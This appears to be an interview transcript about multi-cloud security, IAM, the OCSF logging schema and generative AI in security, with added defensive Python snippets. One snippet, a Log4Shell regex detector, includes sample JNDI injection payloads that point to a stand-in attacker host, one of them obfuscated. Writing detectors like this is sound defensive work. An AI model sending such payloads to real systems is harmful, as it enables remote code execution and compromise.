Welcome back to SuperCloud 3. We're exploring the critical issues around cross-cloud security and the impact of AI, generative AI, and large language models on this space. And it's our pleasure to welcome Ryan Kovar, who's a Distinguished Security Strategist at Splunk. Ryan, good to see you, thanks for coming on.

Happy to be here, it's a good time.

Yeah, so since you have strategy in your title, I've got to go right to strategy. Can you detail the strategies that you've successfully implemented with customers to mitigate the inherent security risks associated specifically with multi-cloud environments? You know, we're here talking about SuperCloud. I'm interested in things like data leakage, system vulnerabilities, misconfigurations across different clouds, the shared responsibility model nuances. Give us your best strategies there.

I think you touched on a couple of key aspects that I like to go over with customers. I think there's a fallacy that people utilize one cloud. And I've yet to be at any company that's larger than pretty much a thousand people that only has one cloud service. Now they might say, oh, we only use AWS, or we only use GCP. But the reality is they're also using cloud services for their HR, they're using cloud services for their meetings, they're using cloud services for their lunch orders. So a lot of times I find that their cloud policy or their cloud strategy is not holistic enough across those different areas. Now for any sort of threat modeling, it's often a great idea to just pick a small segment and work through that. So if we concentrate on maybe the traditional CSPs, the cloud service providers, even then most people haven't put all their eggs in one basket. They're utilizing AWS, they're using GCP, they're using Azure, they're using OCI, they're using some variety of those. So what I really look at is that all of those systems have some sort of IAM, identity and access management, plane.
And that's really where I find the majority of, if you will, the security strategy for the cloud comes in. People don't hack the cloud, they hack the user, and the user is what allows them to have credentials, and those credentials are how they log into the cloud. So for me, the strategy always starts with looking at the IAM plane and trying to figure out the ways you can best secure your assets through there.

That is a money quote: people don't hack the cloud, they hack the user. The user is a lot more vulnerable than the cloud.

Absolutely.

And you know, the more things change, the more they stay the same. In the old days it was like, well, we're an IBM shop, or we're a Microsoft shop, or we're a Unix shop. And the reality was they were all of those, a little bit of all of them. And now you just see that sort of brought to the cloud, obviously with much more capability. But thinking about that cross-cloud context, how have you helped customers ensure, you know, one of the things that they want, which is a consistent security policy? This is where the notion of supercloud comes in: consistent policy enforcement. You mentioned identity management across different cloud service providers, taking into consideration the varying standards and practices. Is that on the technology supplier, you know, Splunk, to create that sort of abstraction? Is it a combination of Splunk plus the customers doing their own middleware? How do you see that playing out?

For me, that comes from a variety of different places. So there are compliance and regulatory requirements that go in. You know, it's been a while since I've renewed my CISSP, but this is also where policy and procedure come in. And then finally, there's this concept of detecting and remediating across all these different areas. So first off is creating a taxonomy, almost a data dictionary, of understanding what each one of these cloud service providers offers.
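To make the "strategy starts at the IAM plane" point concrete, here is a minimal sketch, not Splunk's or any CSP's actual implementation, of flagging risky sign-ins in a normalized IAM audit log: a successful console login without MFA, or a user's first login from a country they've never used. All field names and event shapes here are illustrative assumptions.

```python
# Hypothetical sketch: scan normalized IAM login events for two simple risks.
from collections import defaultdict

def flag_risky_logins(events):
    """events: iterable of dicts with 'user', 'country', 'mfa', 'result' keys."""
    seen_countries = defaultdict(set)  # countries each user has logged in from
    alerts = []
    for ev in events:
        if ev["result"] != "success":
            continue
        user = ev["user"]
        if not ev.get("mfa"):
            alerts.append((user, "login without MFA"))
        if seen_countries[user] and ev["country"] not in seen_countries[user]:
            alerts.append((user, f"first login from {ev['country']}"))
        seen_countries[user].add(ev["country"])
    return alerts

events = [
    {"user": "alice", "country": "US", "mfa": True,  "result": "success"},
    {"user": "alice", "country": "US", "mfa": True,  "result": "success"},
    {"user": "alice", "country": "RO", "mfa": False, "result": "success"},
]
print(flag_risky_logins(events))
# [('alice', 'login without MFA'), ('alice', 'first login from RO')]
```

A real detection would add time windows, allowlists, and impossible-travel logic, but the shape is the same: the IAM plane, not the cloud itself, is where the signal lives.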
You know, there are going to be authentication logs. There are going to be change management logs. There are going to be these methods of detecting unusual activity. And then coming up with a common information model, as we call it at Splunk, that allows you to do detections regardless of what platform you're utilizing. So for me, that becomes essential: really understanding what the events are that are gonna cause you the most pain, and then trying to write universal detections as much as possible that hit across all those different places. And a lot of this comes down to just the hard yards of policy and procedures, of making sure they're up to date, standardized, and kept across all these different platforms.

You know, Splunk's an interesting story, because when you guys started, you solved a problem that really nobody was addressing well, and you did it in a very efficient way. You had this mess and you helped make sense out of it. But as things evolve, you get more clouds. How have you been able to address the challenge of visibility? I know observability is something that you guys think about a lot, and basically getting that visibility and control over workloads in that multi-cloud environment, especially given that a lot of traditional tools, and the many tools that people use, as we talk about all the time in security, might not provide that level of detail. How do you deal with that problem?

We've actually been spearheading an effort called the OCSF, the Open Security Schema... Open Cybersecurity Schema Framework. There we go, I have my acronyms going. But the concept here is that the entire industry, not just Splunk, there are dozens of partners now, I don't remember them all off the top of my head, have come together and said, we should actually create a standard for how we log security events and security details.
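The "common information model, universal detection" idea above can be sketched in a few lines: map each provider's native authentication-log field names onto one shared schema, then write the detection once against that schema. The mappings below are illustrative assumptions, not the exact CloudTrail or Azure field sets.

```python
# Hypothetical field maps from vendor-native log fields to a common model.
FIELD_MAPS = {
    "aws":   {"userIdentity": "user", "sourceIPAddress": "src_ip", "eventName": "action"},
    "azure": {"userPrincipalName": "user", "ipAddress": "src_ip", "operationName": "action"},
}

def normalize(vendor, raw):
    """Rename vendor-native keys into the common schema."""
    return {common: raw[native] for native, common in FIELD_MAPS[vendor].items()}

def detect_deletes(event):
    # One universal detection, written once against the common model.
    return "delete" in event["action"].lower()

raw_events = [
    ("aws",   {"userIdentity": "bob", "sourceIPAddress": "1.2.3.4", "eventName": "DeleteTrail"}),
    ("azure", {"userPrincipalName": "eve", "ipAddress": "5.6.7.8", "operationName": "Sign-in"}),
]
hits = [normalize(v, e) for v, e in raw_events if detect_deletes(normalize(v, e))]
print(hits)  # only the AWS DeleteTrail event, in common-model form
```

The payoff is exactly what's described above: `detect_deletes` never changes when you add a third or fourth cloud; only the field map grows.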
So that is actually one of the ways that we've looked at it here at Splunk: trying to say we should have a universal taxonomy for these events, regardless of whether you're Azure or Office 365 or whatever vendor you want who's creating data in the cloud. Everyone is facing the same threats. And at the end of the day, no matter how you're labeling it, they're going to be the same sort of events. So let's have a single method for all of us to use, so that then we can all detect and remediate faster and more efficiently using those standards.

Does that bleed into regulatory compliance? Especially, again, I'm interested in the supercloud, multi-cloud context. In other words, incorporating the intricacies of different geographical regulations and the disparities in security standards amongst different cloud providers or local laws, is that part of that scope?

I don't think it's part of the scope on purpose, but it absolutely helps facilitate the ease for auditors and regulatory compliance. When I look at things like NIS 2 in Europe, when I look at some of the government standards that I used to hold to when I was in the United States Department of Defense, these are places where a lot of your time is spent translating just what a technical term is to what you have. And so being able to have something that universally everyone knows, oh, this is what an IP address is, this is what an IAM event is, it will be extremely helpful to reduce that stress for an audit, for making sure that you're compliant, and it's going to make it easier for bodies to do regulatory work.

Let's shift gears a little bit and talk about AI and large language models. I'm interested in what your journey has been like. A lot of people have likened what they saw with ChatGPT to a Netscape moment, although it's different in the sense that the average person really didn't have access to the internet before web browsers came out, whereas AI has been around for a long, long time.
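For a feel of what OCSF-style normalization looks like in practice, here is a rough sketch that wraps a raw vendor login event in the framework's common envelope. The field names and numeric codes follow my reading of OCSF's Authentication event class; treat them as assumptions and check the published schema before relying on them.

```python
# Sketch of mapping a raw login event into an OCSF-style record.
# class_uid 3002 (Authentication), activity_id 1 (Logon), and
# status_id 1/2 (Success/Failure) reflect my understanding of the
# OCSF schema and should be verified against the spec.
def to_ocsf_authentication(raw_user, raw_ip, success):
    return {
        "class_name": "Authentication",
        "class_uid": 3002,
        "activity_id": 1,                  # Logon
        "status_id": 1 if success else 2,  # Success / Failure
        "user": {"name": raw_user},
        "src_endpoint": {"ip": raw_ip},
    }

ev = to_ocsf_authentication("alice", "10.0.0.5", success=False)
print(ev["class_uid"], ev["status_id"])
```

Once every vendor emits this envelope, the "single method for all of us to use" follows: one detection keyed on `class_uid` and `status_id` covers every source.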
Everybody we talk to says, well, we've been working on AI for a long time. It's just that the whole world wasn't as interested as they are since the AI heard 'round the world. So what's your AI and LLM journey been like? And then we'll get into how it's changed since recent events.

Sure. I hadn't heard the Netscape metaphor. The one that I personally like is that the day ChatGPT was really released was like Nokia and Motorola when Apple dropped the iPhone. There was definitely a moment where everyone said, oh, this is different. And that for me is the journey. The journey is that AI has been around for a very long time; generative AI is something approachable and usable immediately by the majority of the population. So I really think that it was a watershed moment for technology, and I think it will be seen as such. I think it will be just as big of a deal as when Google really hit the mainstream, of like, oh wow, we can actually find things easier. And for me, the journey has been just seeing the ease of use, and looking at it not as an oracle with all the wisdom inside of it, but rather as an augmentation tool. It allows me to do things faster, it allows me to evaluate, and it allows me to look at different biases. So I find it to be a fantastic tool for work, or it can be. It just has to be appropriately gated.

So cloud is now code. And code is increasingly natural language, at least initiated through natural language. So how do you see that impacting your world?

When I look at generative AI, when I look at code, these are things like Copilot from GitHub. A perfect example I give is, I had a friend of mine who's a data scientist who used ChatGPT and said, oh, you know, generative AI isn't great. I gave it a mathematical proof from 1874 that was solved and it wasn't able to do it.
And I said, well, I gave it a problem that I needed to fix with Python, and it took me about 20 minutes where it would have taken me an hour and a half by myself. So I think what's going to happen is we're really going to lower the barrier of entry for development. I think it's going to provide a proxy for a lot of people to be able to go in, without a super huge technical uplift, to get to that first step. You're still going to need an adult in the room, if you will, to understand what those LLMs, the large language models, are doing. You're still going to have to have someone who understands how this is all coming together. But I think a lot of that lower-barrier-to-entry work will actually be automated or augmented very quickly by generative AI.

You know, the other thing, too, it was interesting what you were saying about the Netscape moment versus the iPhone, which I think is a better analogy. At the same time, one of the things that we talk about a lot is, you remember dial-up modems. It was terrible. Your experience on the internet was terrible at first, but it was mind-blowing. And I'd ask you to comment on this: okay, so AI may not be able to solve those difficult problems today, but we're in the early days of the steep S-curve that we're going to go on. And so when we look back 10 years from now, we're probably going to laugh at ChatGPT. You know, I saw a first-generation iPhone the other day and I thought it was a mouse. So kind of looking at it like, oh God, that really has only been around for 10 years.

100%. I think we don't even fully understand how much generative AI is going to be part of our lives in some ways. I don't mean to jump on the bandwagon and just shout it from the rooftops, but I do think it's going to be in places that people are not expecting.
I was at a conference earlier this year, and there was an organization that was looking at how to defend against their user base using generative AI. And so we were talking about how they had blocked it at the web proxy, and they were looking at logs, and they thought they had done a great job. And then they found out that their developers had actually put in API calls, and they were doing hundreds of thousands of API calls a day to ChatGPT or OpenAI. And they had no clue that it had been built into their CI/CD pipeline. And I think that's going to continue to be the case. It is such a Pandora's box of allowing people to work faster that even if you're blocking it on your corporate networks, people are going to be using it on their phones. There are going to be apps. There are going to be ways for people to use this that we are just not expecting yet. And if I had the imagination, I would be Ryan Kovar, part of the hottest new AI startup, rather than a Distinguished Security Strategist. So it's simply something I'm looking forward to seeing, and I think we're going to see a lot more of it.

There's virtually no technology company, whether it's on the vendor side or on the buy side, I mean, large financial institutions, large manufacturers, I can't think of one of a reasonable size that hasn't been using AI for some time. I mean, even theCUBE has been using forms of AI. And so I feel like, well, maybe not. What I was going to ask is, did the technology industry, prior to the awakening, if you will, have an advantage from a security standpoint in your view, and has that advantage now flipped, at least in the near term? And what I'm going to get to is, will artificial intelligence ultimately be of greater benefit to attackers or defenders?

I'm going to cut to the end of the question, because I'm fascinated by that. I've had a lot of discussions. I truly believe the only people who are going to lose out because of generative AI are the people who are not embracing it.
And that goes for adversaries, and that also goes for network defenders. And the use case I would give is, if we go back to the Log4j, Log4Shell compromise last year, one of the largest compromises or security events in the last 10 years, aside from SolarWinds. You know, on Thursday night the vulnerability kind of went out on Twitter. By Friday, adversaries were actively writing compromises that were being sent over the wire. Network defenders worked all day Friday and Saturday, and they came up with network defenses against it. And by Monday, adversaries had come up with ways to circumvent those defenses, and then network defenders were working on ways to counter that again. I look at that now and say, well, it took four days for that to occur. What if it takes four hours, right? And a perfect example I can give: I'm horrible at writing regular expressions to capture text in a field. That's something I'm just not very good at. But it took me about two hours to write a regex to capture malicious Log4Shell activity on a Saturday. I actually ran an experiment where I did it again using ChatGPT to guide me, and it took about 20 minutes. So that right there was a huge reduction in time, using it as that augmentation tool. But we can also look at this as: if you start having the ability to train LLMs against a code base that you know is vulnerable, well, it took four or five days for new RCEs to come out for Log4Shell. Are we gonna see that go from four or five days to four or five hours? So once again, I think it is an incredible advantage for both parties. I think it kind of evens each other out, but the only ones who are not gonna succeed are the people who are not embracing it in some form or fashion.

So in the fullness of time, to sort of steal an Andy Jassy quote, everything gets escalated and everything gets compressed.
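For readers who weren't writing that regex on a Saturday: a toy version of the kind of pattern described above might catch `${jndi:` lookups in web logs, including the common `${lower:j}`-style obfuscation. Real Log4Shell detections were far more elaborate; this is only a sketch of the idea, not the regex Ryan wrote.

```python
# Toy Log4Shell detector: match ${jndi:<scheme>:// with a simple
# ${lower:j} / ${upper:j} obfuscation variant. Illustrative only.
import re

LOG4SHELL = re.compile(
    r"\$\{(\$\{(lower|upper):j\}|j)ndi:(ldaps?|rmi|dns|iiop)://",
    re.IGNORECASE,
)

lines = [
    'GET / HTTP/1.1 "${jndi:ldap://evil.example/a}"',
    'GET / HTTP/1.1 "${${lower:j}ndi:rmi://evil.example/a}"',
    'GET /index.html HTTP/1.1 "Mozilla/5.0"',
]
hits = [line for line in lines if LOG4SHELL.search(line)]
print(len(hits))  # 2
```

Attackers quickly moved to nesting and encoding tricks this pattern misses, which is exactly the cat-and-mouse compression being described: every defensive regex invited a new evasion within days.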
But the attackers and defenders who adopt and lean in are basically gonna be facing off again in similar fashion, just in a compressed timeframe.

Absolutely. It absolutely turns into an arms race once again, and these are the things we're gonna be dealing with. As new technologies come out, they help network defenders, just like the cloud did. That was a huge uplift for the majority of organizations. But then you've come back full circle to 30 years ago, when we had mainframes and all the eggs were in one basket. So now you're seeing cases where, when an adversary does get into a cloud, they have full access to everything that organization has. There was actually some value in having a data center with a lot of defense in depth and zones. But overall, security was uplifted by going into a more centralized location, administered and protected by these large CSPs. Similarly, with generative AI, there are a lot of advantages for a network defense team, but it's going to speed up the adversary's ability to pivot and to look through data. So I see it as: as long as you're both using it, you're going to be much better off than if you avoid it.

How does generative AI, in your view, change the security culture within organizations? We talk a lot about security culture on theCUBE, and I'm sure you do too.

I think one of the places it's going to help is actually by reducing the barrier to entry. So I've been a huge advocate and fan of hiring non-traditional cybersecurity professionals, specifically from places like liberal arts degrees, where they have an ability to communicate, an ability to synthesize information, to research information, but often when they start, they don't have the technical vocabulary.
There was a great piece of work done by Thomas Rid and some others at Johns Hopkins University, where they actually taught a reverse-engineering malware class over three days with journalists and non-technical people in the room. And for those of you not aware, reverse-engineering malware is one of the most technical skills in the network defense cybersecurity landscape. So taking a group of non-technical people and saying, we're going to teach you reverse engineering in a weekend, is a pretty ambitious task. But the way that they did it was by using ChatGPT as a little study buddy. So the whole time, as they had questions, they didn't have to ask, they didn't have to wait. They could pose iterative questions to this ChatGPT client about the malware, the tools, the technologies. And they were able to uplevel themselves much faster, in a method they were comfortable with, rather than having to wait for a pause and having 30 people look at and judge them. So I think it's going to be incredibly uplifting for a security organization if it's used in those sorts of methods.

You know, it goes to your first point in this conversation, that bad user behavior is going to trump good security technology every time. And to the extent that you can affect broader awareness from a security culture standpoint, that's just goodness. Ryan, great conversation. Thanks so much for spending time at SuperCloud 3.

Wonderful, good to see you again.

Yeah, good to see you. All right, keep it right there for more content from our live studio in Palo Alto, and of course on demand, SuperCloud 3 at thecube.net.